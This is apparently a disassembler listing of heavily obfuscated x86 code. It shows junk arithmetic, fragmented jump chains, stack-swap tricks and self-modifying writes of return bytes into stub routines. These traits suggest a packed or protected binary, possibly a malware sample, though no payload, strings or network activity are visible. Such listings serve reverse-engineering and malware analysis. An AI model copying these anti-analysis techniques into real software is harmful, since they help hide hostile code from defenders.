; FUNCTION CHUNK AT 00458BD4 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		push	5B73BC80h
		pop	eax
		xor	eax, 36086F20h
		and	eax, 0FB336BDDh
		jmp	loc_449E16
sub_43D1BD	endp

; ---------------------------------------------------------------------------
		ror	esi, 9
		test	edi, 0C8EF9BD3h
		jmp	loc_44B249
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_43D1E7:				; CODE XREF: sub_4477A2:loc_4549BEj
		jge	loc_459EA5

loc_43D1ED:				; CODE XREF: y2kk37jd:0043C314j
		jmp	loc_457E25
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
		shl	edi, 1Eh
		sbb	ebx, ebp
		xchg	edx, ebp
		jle	loc_4402C7
		jmp	loc_459EA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_43D204:				; CODE XREF: sub_457524-1909Fj
		jz	loc_44C398
		jmp	loc_43EA70
; END OF FUNCTION CHUNK	FOR sub_457524

; =============== S U B	R O U T	I N E =======================================



sub_43D20F	proc near		; CODE XREF: y2kk37jd:00448EC9p
					; y2kk37jd:00457E51j

; FUNCTION CHUNK AT 00454BFC SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	ds:off_41E0AC, eax

loc_43D219:				; CODE XREF: y2kk37jd:loc_449F10j
		lea	eax, loc_446C6B

loc_43D21F:				; CODE XREF: y2kk37jd:loc_45A62Cj
		mov	byte ptr [eax],	0C3h
		jmp	loc_454BFC
sub_43D20F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_43D227:				; CODE XREF: sub_43BD3D:loc_43DF99j
					; sub_44E63A:loc_446C6Bj
		xchg	ecx, [esp+4+var_4]
		mov	edx, ecx
		pop	ecx
		jmp	loc_441E93
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
		or	ebp, 0F363ADB8h
		mov	[esi], edi
		jmp	sub_4531A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_43D23F:				; CODE XREF: sub_45447D-5545j
		sub	edx, 824EA369h
		adc	ecx, esi
		jmp	loc_45BF35
; ---------------------------------------------------------------------------

loc_43D24C:				; CODE XREF: sub_45447D+4j
		cmp	dword ptr [ebp-4], 4
		jnz	loc_45BF35
		jmp	loc_44B60E
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453969

loc_43D25B:				; CODE XREF: sub_453969+Ej
		or	eax, 67F3A1F3h
		rol	eax, 1Bh
		xor	eax, 969994EFh
		add	eax, ebp
		add	eax, 96D9F6ACh
		push	offset loc_43B444
		jmp	loc_45B9B0
; END OF FUNCTION CHUNK	FOR sub_453969
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B7C

loc_43D27C:				; CODE XREF: sub_440B7C:loc_45944Aj
		call	sub_44B03F
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-10h], 0
		jz	loc_458FB4
		jmp	loc_457E46
; END OF FUNCTION CHUNK	FOR sub_440B7C
; ---------------------------------------------------------------------------
		jge	loc_453221
		jmp	sub_453B77
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_43D29E:				; CODE XREF: sub_440040+19AFAj
		js	loc_443445

loc_43D2A4:				; CODE XREF: sub_440040:loc_45C46Fj
		mov	eax, 1F56AC7Bh
		push	esi
		push	46D1CE3Fh
		pop	esi
		and	esi, 0FA6B6FBAh
		xor	esi, 0B81E06F5h
		jmp	loc_44799E
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B019

loc_43D2C1:				; CODE XREF: sub_45B019:loc_45A5CBj
		mov	[ebp+var_20], eax
		mov	eax, [ebp+var_20]
		mov	[ebp+var_28], eax
		mov	[ebp+var_14], 4
		mov	eax, [ebp+var_14]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_14]
		mov	[ebp+var_C], eax
		jmp	loc_458EBF
; END OF FUNCTION CHUNK	FOR sub_45B019
; ---------------------------------------------------------------------------

loc_43D2E2:				; CODE XREF: y2kk37jd:loc_44EF8Fj
		push	offset loc_441A32
		jmp	loc_452957
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_296. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43D2ED:				; CODE XREF: sub_4458DD+894Bj
		jmp	nullsub_161
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_43D2F2:				; CODE XREF: sub_457FDC-122E6j
		jmp	loc_445999
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_43D2F7:				; CODE XREF: sub_4514DE-13ABFj
		jmp	loc_452784
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_43D2FC	proc near		; DATA XREF: sub_43CE38+5o

; FUNCTION CHUNK AT 004416B5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447080 SIZE 00000012 BYTES

		push	4203996Dh
		pop	esi
		rol	esi, 0Ch
		or	esi, 0C177464Ah
		test	esi, 1000000h
		jmp	loc_4416B5
sub_43D2FC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_43D316:				; CODE XREF: sub_443BAF-884Cj
		xor	ebx, 16DA2881h

loc_43D31C:				; CODE XREF: y2kk37jd:loc_451CA3j
		call	sub_44884D
		mov	edx, 3BD2EC5Ch
		jmp	loc_43F660
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_43D32B:				; CODE XREF: sub_4429DD:loc_43B9A3j
		cmp	byte ptr [ebp-5], 0
		jnz	loc_448B33
		jmp	loc_45882A
; END OF FUNCTION CHUNK	FOR sub_4429DD

; =============== S U B	R O U T	I N E =======================================



sub_43D33A	proc near		; CODE XREF: y2kk37jd:00455CE1j
					; sub_44CA8F+AC3Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00459467 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	esi, 21310BE5h
		xchg	esi, [esp-4+arg_0]
		jmp	loc_459467
sub_43D33A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	0EB908641h
		pop	eax
		rol	eax, 17h
		sub	eax, 0A738AFB6h
		jns	loc_441625
; START	OF FUNCTION CHUNK FOR sub_44572F

loc_43D361:				; CODE XREF: sub_44572F-43B8j
		jmp	loc_4586D1
; END OF FUNCTION CHUNK	FOR sub_44572F
; ---------------------------------------------------------------------------
		sub	ecx, 0CDC3A2C4h
		jmp	loc_44161F
; ---------------------------------------------------------------------------

loc_43D371:				; DATA XREF: y2kk37jd:00446F0Do
		call	sub_43C326
		mov	eax, 934299CDh
		call	sub_442C3E
		mov	ds:dword_41E0F0, eax

loc_43D386:				; CODE XREF: y2kk37jd:0044EE91j
		jmp	loc_457F1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_43D38B:				; CODE XREF: sub_448CAE:loc_44152Dj
					; y2kk37jd:00441549j
		xor	eax, 0B5AE0205h
		cmp	eax, 4C30D4FDh
		jmp	loc_456DAB
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------

loc_43D39C:				; CODE XREF: y2kk37jd:0045095Aj
		or	ebx, 254A0DEAh
		and	edx, 81E5BF87h
		jmp	loc_450132
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423DA

loc_43D3AD:				; CODE XREF: sub_44BD20-E475j
					; sub_4423DA:loc_458C24j
		push	offset loc_44EDCA
		jmp	loc_449E3F
; END OF FUNCTION CHUNK	FOR sub_4423DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43D3B7:				; CODE XREF: sub_45689F-1098Aj
		or	ebx, 0A538305Ch
		add	ebx, 0C51467h
		xchg	ebx, [esp+0]
		jmp	sub_4464B3
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_43D3CB:				; CODE XREF: y2kk37jd:00444248j
		xchg	eax, [esp]
		mov	ebp, esp
		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp]
		push	edx
		jmp	loc_441BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_43D3DC:				; CODE XREF: sub_44F641:loc_457012j
		xchg	ebx, [ecx]
		mov	ebp, edi
		sub	edi, 2EDA5584h
		jmp	loc_458C71
; END OF FUNCTION CHUNK	FOR sub_44F641

; =============== S U B	R O U T	I N E =======================================



sub_43D3EB	proc near		; CODE XREF: sub_43F8B8:loc_43EC33p
					; y2kk37jd:00445CDEj

; FUNCTION CHUNK AT 0044F2BB SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00459A1B SIZE 00000010 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	al, 1
		shl	al, cl
		jmp	loc_44F2BB
sub_43D3EB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		js	loc_454F16
		jmp	sub_451F6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44884D

loc_43D403:				; CODE XREF: sub_44884D+A4CBj
		pop	ebx
		lea	eax, nullsub_2
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_2
; END OF FUNCTION CHUNK	FOR sub_44884D

; =============== S U B	R O U T	I N E =======================================



sub_43D412	proc near		; CODE XREF: sub_405004+27p
					; y2kk37jd:00447C69j
					; DATA XREF: ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004406CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446CF5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447C6F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B168 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E3EC SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004565D4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457D25 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045AE21 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BA4B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045C634 SIZE 00000005 BYTES

		push	ecx
		push	28B170C3h
		jmp	loc_440815
sub_43D412	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43D41D	proc near		; CODE XREF: y2kk37jd:0044A854j
					; sub_4552EB-8BFCp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EFFE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043FED7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447908 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D0E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AC18 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044E0D9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E793 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045009C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045206E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452C6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C4B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC36 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045C092 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	eax, eax
		jnz	loc_44AC18
		jmp	loc_45C092
sub_43D41D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_43D42E:				; CODE XREF: sub_453B0B-106A5j
		pop	eax
		sub	eax, 0EA2554D4h
		and	eax, 0C8160BBFh
		rol	eax, 12h
		add	eax, 195C3127h
		xor	eax, 79119849h
		jmp	loc_4524BA
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43D44F:				; CODE XREF: sub_445226:loc_44661Cj
		jl	loc_44F6C5

loc_43D455:				; CODE XREF: sub_45C01A-5953j
		jmp	nullsub_309
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jb	loc_458479
		test	esi, ebx
		jmp	loc_43DE35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F1C4

loc_43D467:				; CODE XREF: sub_43F1C4+Ej
		mov	ecx, ebx
		pop	ebx
		add	ecx, 0EF669CE4h
		and	ecx, 6E07D750h
		add	ecx, 9E40A94Ah
		jmp	loc_448271
; END OF FUNCTION CHUNK	FOR sub_43F1C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443831

loc_43D481:				; CODE XREF: sub_443831+6j
		jz	loc_445B62
		jmp	loc_45A576
; END OF FUNCTION CHUNK	FOR sub_443831
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43D48C:				; CODE XREF: sub_44C304:loc_450529j
					; sub_44C304+4238j
		rol	edx, 0Eh
		cmp	edx, 0D1304E8Fh
		jmp	loc_43DE86
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43D49A:				; CODE XREF: sub_4458DD+3089j
		jz	loc_44C075

loc_43D4A0:				; CODE XREF: sub_43E679:loc_448652j
		jmp	loc_44B57E
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		mov	ecx, 16386C48h
		jmp	loc_456186
; ---------------------------------------------------------------------------

loc_43D4AF:				; CODE XREF: y2kk37jd:0044A3BFj
		pop	esi
		mov	eax, [esp]
		push	edx
		call	sub_4464B3
		jmp	loc_457250
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457042

loc_43D4BE:				; CODE XREF: sub_457042:loc_45B4DEj
		push	offset loc_445879
		jmp	nullsub_382
; END OF FUNCTION CHUNK	FOR sub_457042
; ---------------------------------------------------------------------------

loc_43D4C8:				; CODE XREF: y2kk37jd:00448CA3j
		js	loc_44B9B2

; =============== S U B	R O U T	I N E =======================================



sub_43D4CE	proc near		; CODE XREF: sub_44594E-292Dp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C141 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004520AE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DB3 SIZE 00000008 BYTES

		xchg	eax, [esp+4+var_4]

loc_43D4D1:				; CODE XREF: y2kk37jd:0045A71Aj
		pop	eax
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	ecx
		inc	ds:dword_446608
		lea	eax, nullsub_21
		jmp	loc_454297
sub_43D4CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_43D4E9:				; CODE XREF: sub_44107E+14C93j
		pop	ecx
		or	ecx, 0A119BE0Ah
		xor	ecx, 3D29F980h
		add	eax, ecx
		pop	ecx
		mov	eax, [eax]
		push	eax
		jmp	loc_44AA80
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_43D501:				; DATA XREF: sub_457026+2CE0o
		pop	ebp
		mov	eax, ds:dword_447338
		push	offset sub_452995
		jmp	loc_44F656
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_43D512:				; CODE XREF: sub_44E648:loc_44B337j
					; sub_44E648+71F8j
		call	sub_44884D
		test	eax, eax
		setnz	byte ptr [ebp-1]
		jmp	loc_44CB83
; END OF FUNCTION CHUNK	FOR sub_44E648

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43D522	proc near		; CODE XREF: sub_44DAE1j

; FUNCTION CHUNK AT 0044AB26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DFA SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_44AB26
sub_43D522	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_43D52A:				; CODE XREF: sub_458A74-2669j
		jp	loc_442979
		mov	[ebx], edx
		push	56EAC764h
		jmp	loc_43CBAC
; END OF FUNCTION CHUNK	FOR sub_458A74
; ---------------------------------------------------------------------------

loc_43D53C:				; CODE XREF: y2kk37jd:loc_4435CFj
					; y2kk37jd:004435EAj
		add	edi, 6A06DAB0h
		add	edx, edi
		pop	edi
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_43CAC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_43D550:				; CODE XREF: sub_44BD20:loc_443290j
		mov	eax, 0B9726E5Ah
		call	sub_442C3E
		push	offset loc_448B6E
		jmp	nullsub_70
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
		mov	ds:dword_41E17C, eax
		lea	eax, nullsub_1
		mov	byte ptr [eax],	0C3h
		jmp	loc_448013
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_448441
; ---------------------------------------------------------------------------

loc_43D581:				; CODE XREF: y2kk37jd:loc_45B390j
		add	eax, ecx
		jmp	loc_4596FD
; ---------------------------------------------------------------------------

loc_43D588:				; CODE XREF: y2kk37jd:0044C4F3j
		ja	loc_43F3D8

; =============== S U B	R O U T	I N E =======================================



sub_43D58E	proc near		; CODE XREF: sub_45623A-381p

; FUNCTION CHUNK AT 00455AC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A030 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A045 SIZE 00000008 BYTES

		xchg	edx, [esp+0]

loc_43D591:				; CODE XREF: sub_43B765:loc_452CC2j
		pop	edx
		or	eax, eax
		jnz	loc_45A045
		call	sub_45405E
		mov	edx, 0B9726E5Ah
		jmp	loc_45A030
sub_43D58E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44479B

loc_43D5A9:				; CODE XREF: sub_44479B:loc_4597F0j
		sub	eax, 0FFFFFFFFh
		jl	loc_43CC4C
		jmp	loc_4429B7
; END OF FUNCTION CHUNK	FOR sub_44479B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43D5B7:				; CODE XREF: y2kk37jd:0045066Aj
					; sub_43F8B8:loc_45B3D2j
		push	offset sub_451682
		jmp	loc_43BEEB
; END OF FUNCTION CHUNK	FOR sub_43F8B8

; =============== S U B	R O U T	I N E =======================================



sub_43D5C1	proc near		; CODE XREF: sub_449129:loc_44A0A5p
					; y2kk37jd:0045204Aj

; FUNCTION CHUNK AT 0043F4A3 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00447EBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CDEF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452437 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	dword ptr [eax], 6C43776Fh
		lea	eax, [ebp-14h]
		jmp	loc_44CDEF
sub_43D5C1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43D5D3:				; CODE XREF: y2kk37jd:0043BDA5j
					; sub_453867-FE55j
		test	esi, edx
		jmp	loc_444BCC
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		pop	edi
		sbb	ebx, 66B9C569h
		jmp	sub_44A57D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_43D5E6:				; CODE XREF: sub_440337:loc_456369j
		jnz	loc_458563

loc_43D5EC:				; CODE XREF: y2kk37jd:00448C02j
		jmp	loc_448402
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
		or	esi, 0E9E7EFFh
		shr	eax, 1
		jmp	loc_458563

; =============== S U B	R O U T	I N E =======================================



sub_43D5FE	proc near		; CODE XREF: y2kk37jd:0043E13Dj
					; sub_44215Ep ...
		push	offset loc_4455F2
		jmp	nullsub_26
sub_43D5FE	endp

; ---------------------------------------------------------------------------
		sub	eax, 0B0F83C9Eh
		jmp	sub_449DFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_43D613:				; CODE XREF: sub_4514DE+8C3Dj
		jnz	loc_43C597
		jmp	loc_45479F
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_43D61E	proc near		; CODE XREF: sub_43DF1F:loc_455FB7j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043CEE3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442455 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044586A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C7F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00457A6D SIZE 00000005 BYTES

		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+8+var_8]
		call	sub_459A7D
		jmp	loc_457A6D
sub_43D61E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D62E:				; CODE XREF: y2kk37jd:004555BAj
		jns	loc_45726E
		push	eax

loc_43D635:				; CODE XREF: y2kk37jd:loc_4555ADj
		and	esi, 0D5AFEB50h
		rol	esi, 1Eh
		jmp	loc_44CE4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_43D643:				; CODE XREF: sub_440337+B6F1j
		call	sub_4464B3
		push	0A3D14268h
		call	sub_457042

loc_43D652:				; CODE XREF: sub_45136B+A3CAj
		jmp	loc_45492C
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_43D657:				; CODE XREF: sub_43E389+952j
		jmp	loc_44D8DA
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43D65C:				; CODE XREF: sub_43C46D:loc_452B70j
		jl	loc_440BD2

loc_43D662:				; CODE XREF: y2kk37jd:0044EF95j
		jmp	loc_454E41
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43D667:				; CODE XREF: sub_4458DD+8DECj
		jmp	loc_44D7A8
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BBF8

loc_43D66C:				; CODE XREF: sub_45BBF8-16DE4j
		jmp	nullsub_403
; END OF FUNCTION CHUNK	FOR sub_45BBF8
; ---------------------------------------------------------------------------
		test	esi, 0D8F6F00Fh
		jmp	loc_452853

; =============== S U B	R O U T	I N E =======================================



sub_43D67C	proc near		; CODE XREF: y2kk37jd:0043C568j
					; y2kk37jd:00457591p
		xchg	esi, [esp+0]
sub_43D67C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43D67F:				; CODE XREF: sub_43C851:loc_4582C8j
		pop	esi
		cmp	edx, ebx
		xchg	edi, [esp-8+arg_4]
		mov	ebx, edi
		pop	edi
		xor	eax, ecx
		jmp	loc_444544
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		lea	eax, [ebp-8]
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		mov	eax, [ebp+8]
		push	esi
		mov	esi, eax

loc_43D69E:				; CODE XREF: y2kk37jd:0043FFA1j
		xchg	esi, [esp]
		jmp	loc_45B812

; =============== S U B	R O U T	I N E =======================================



sub_43D6A6	proc near		; CODE XREF: y2kk37jd:0044C14Bp
					; y2kk37jd:00452803j

; FUNCTION CHUNK AT 0044FA6C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045C6D8 SIZE 00000015 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[edx-10h], eax
		inc	dword ptr [ebp-4]
		mov	eax, [ebp+8]
		jmp	loc_44FA6C
sub_43D6A6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D6B8:				; CODE XREF: y2kk37jd:00459D3Fj
		sbb	edx, ecx
		xor	ebx, 0ACB4C21Dh
		cmp	edi, 9612807Fh
		jmp	loc_447FCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_43D6CB:				; CODE XREF: sub_4526A0+12j
		sub	edx, 0AF53EF7Ah
		jnz	loc_43E332
		sbb	ebp, 7736B431h
		jmp	loc_440BE6
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------
		mov	edx, 7DA6ACC0h
		call	sub_440CD1
		push	eax
		ror	eax, 0Bh
		jmp	loc_45888E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_43D6F5:				; CODE XREF: sub_4438B1:loc_43C260j
		sub	eax, 0CE6505ABh

loc_43D6FB:				; CODE XREF: sub_44B79D+FF45j
		rol	eax, 1Ch
		push	edx
		push	0EA60D81Dh
		pop	edx
		sub	edx, 1DFBE11Fh
		rol	edx, 18h
		jmp	loc_44B56E
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------

loc_43D713:				; CODE XREF: y2kk37jd:loc_457CFBj
		jo	loc_43FBE7
		jmp	loc_43CD96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43D71E:				; CODE XREF: sub_4458DD-435Cj
		pop	esi
		add	edx, ecx

loc_43D721:				; CODE XREF: sub_4460D0:loc_4575E2j
		push	ebx
		push	0BF883317h
		pop	ebx
		or	ebx, 8D443E9Fh
		jmp	loc_44A0AA
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43D734:				; CODE XREF: sub_43ED19:loc_44E080j
		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		push	ecx
		jmp	loc_45BA14
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_43D740:				; CODE XREF: y2kk37jd:0044B1C2j
		jnz	loc_457910
		test	ebx, edi
		jmp	loc_448317
; ---------------------------------------------------------------------------

loc_43D74D:				; CODE XREF: y2kk37jd:004407FAj
		jl	loc_445587
		jns	loc_454249
		or	esi, 0F4F298C9h
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_43D75F:				; CODE XREF: sub_455C79:loc_444F33j
		add	esi, 0EC031081h
		sub	esi, 0A8FD7A0Ah
		xor	esi, 5EEC543Bh
		and	eax, esi
		pop	esi
		jmp	loc_44636B
; END OF FUNCTION CHUNK	FOR sub_455C79

; =============== S U B	R O U T	I N E =======================================



sub_43D779	proc near		; DATA XREF: y2kk37jd:0044C8D9o
		ror	eax, 0Ch
		mov	ds:dword_445870, eax
		retn
sub_43D779	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43D783:				; CODE XREF: sub_44C304:loc_451530j
		rol	eax, 0Ch
		push	offset loc_456BF0
		jmp	nullsub_111
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43D790:				; CODE XREF: sub_4411C3+1758Dj
		mov	ds:off_41E0A8, eax
		lea	eax, loc_458736
		mov	byte ptr [eax],	0C3h
		jmp	loc_458736
; ---------------------------------------------------------------------------

loc_43D7A4:				; CODE XREF: sub_4411C3:loc_458736j
		pop	edx
		jmp	loc_442441
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_43D7AA:				; CODE XREF: sub_442EB4+Dj
		jz	loc_452E0B
		jmp	loc_452902
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
		pop	esi
		jmp	sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43D7BB:				; CODE XREF: sub_445226:loc_4549B9j
		mov	eax, [ebp+0]
		pushf
		add	esi, ecx
		popf
		jmp	loc_444593
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_43D7C7	proc near		; DATA XREF: sub_45921B:loc_43EB3Eo
		xor	eax, eax
		mov	ds:dword_4470B8, eax
sub_43D7C7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_43D7CE:				; CODE XREF: sub_43BA66+11j
					; sub_43BA66+1D7B0j ...
		jnb	loc_45BE2A
		cmp	ds:dword_4470C4, 0
		jnz	loc_43F483
		call	sub_45BE0D

loc_43D7E6:				; CODE XREF: sub_442A94+6j
		jmp	loc_45A0D5
